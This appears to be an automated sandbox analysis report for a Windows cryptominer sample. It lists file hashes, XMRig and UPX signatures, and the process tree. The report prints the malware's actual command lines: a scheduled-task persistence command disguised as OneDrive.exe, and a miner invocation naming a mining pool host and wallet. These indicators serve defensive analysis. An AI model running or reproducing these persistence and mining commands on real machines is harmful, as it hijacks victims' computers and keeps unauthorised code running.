Analysis
-
max time kernel
4s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
08-01-2024 04:52
Static task
static1
Behavioral task
behavioral1
Sample
67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
Resource
win7-20231215-en
General
-
Target
67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
-
Size
4.3MB
-
MD5
563f960105584f0430f32774d17a057f
-
SHA1
554fd82d279fe6e4a660c01ede00a9df3647da93
-
SHA256
67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128
-
SHA512
b500a8d51d5b0eef96063517850c191b3f8b99ed72c16342346868e328f1ca2fbff68a91d11ca74268951a21ba57b8e52d655a8ea88cd63bd173ddc8b0d83b3b
-
SSDEEP
98304:fOteFv2s5wfn7DGumus8G/Mul2rq/aReDkizMeQUp:fOtgv2Tfn/Gbug/Mul2rVe4iwVUp
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/4228-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4228-41-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 4208 OneDrive.exe -
resource yara_rule behavioral2/memory/4228-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-18-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4228-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2816 schtasks.exe 4560 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2780 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4208 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4128 67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe Token: SeDebugPrivilege 4208 OneDrive.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4128 wrote to memory of 1484 4128 67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe 26 PID 4128 wrote to memory of 1484 4128 67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe 26 PID 1484 wrote to memory of 2780 1484 cmd.exe 24 PID 1484 wrote to memory of 2780 1484 cmd.exe 24 PID 1484 wrote to memory of 4208 1484 cmd.exe 76 PID 1484 wrote to memory of 4208 1484 cmd.exe 76 PID 4208 wrote to memory of 2464 4208 OneDrive.exe 80 PID 4208 wrote to memory of 2464 4208 OneDrive.exe 80 PID 2464 wrote to memory of 2816 2464 cmd.exe 78 PID 2464 wrote to memory of 2816 2464 cmd.exe 78 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe"C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6FB2.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2464
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵PID:4228
-
-
-
-
C:\Windows\system32\timeout.exetimeout 31⤵
- Delays execution with timeout.exe
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"1⤵
- Creates scheduled task(s)
PID:2816
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe1⤵PID:3760
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"2⤵PID:4212
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"3⤵
- Creates scheduled task(s)
PID:4560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
85KB
MD596de4e6275cf432079699895d350fef7
SHA1fc2e902ae5bb1f28abcdb7414f54f1275ed490df
SHA25660c56f7ce6d4ec230d32bac52d26ce9de750f5e26850543eb35785772fe82703
SHA512c3a057f913489d98df53b9d57d82799ac7bdbf4ff5f677a96c199b2f8fb2a434e339e47676fc6c39d58ba6a4d8dcbe4d1002d362e29506360e1bfc57d2b0b560
-
Filesize
270KB
MD57ce274017f36643fee873ec117d09dbb
SHA1039b601c85965c4a5fd988a272576108ea05908c
SHA256fa5028cbe9c1bf0e451911dfe99eef1cf6a831661d323af6df507519bf0a532d
SHA5128f0867b2fba6d977b54120c263696d7c1ca0e4b5c8cfea1e76e22e484be305f04e3ee0f80de0c86d7db7479a0c54371ba29db1831b5f145807d54190a38725e0
-
Filesize
76KB
MD53f693a58b5821d1c3b775d87e32629c5
SHA149961b0dd034b02e483a671ce158fd44b8044753
SHA256c9e70d6211984b7d0afad3591b03d42c84cf26dfbc15c958d2d3e134b566fc99
SHA51275257b9f1e48818c0c52bb68b7a64917ee0c35e8e9632eae6a2b2bbd83c637dec4f3d2e3ba88fd4f19f6fe28e79e71ed5f4328477a9904e65e7734d887367cc4
-
Filesize
1KB
MD5879faeecba1716ac3ad7bc3662ffb86e
SHA10f489962ae42883915d16449b881e4eb57ec7f9e
SHA256ca38f4cb9f7b3c256a481fd8c86540558a0d9872ba1fc19181483ea5811ced68
SHA512542c9501d4583b86dfacd89e33c31265f2385cb3461fe41d80aeb83d415c2480144a8371ef23175284645569bec1a1274772d1b640d9fab4d002e78740216966
-
Filesize
176B
MD52c8b65910f9192918888c6bfce13cfa1
SHA1070b3c7f338868b13b332e6eae3ff43aafe2ead5
SHA256262d725ccb39db8fe086853d723b6219fefee4c53594d18444ab3e0d3a0e9470
SHA51269b1bfd4128776023cd4ead39b183f9f242f8bc3d32cd7b631d3f0952b67444f7223bb33c345cacd9c5b40e52939778507da5d6a71fef465ae02ae3652d0e612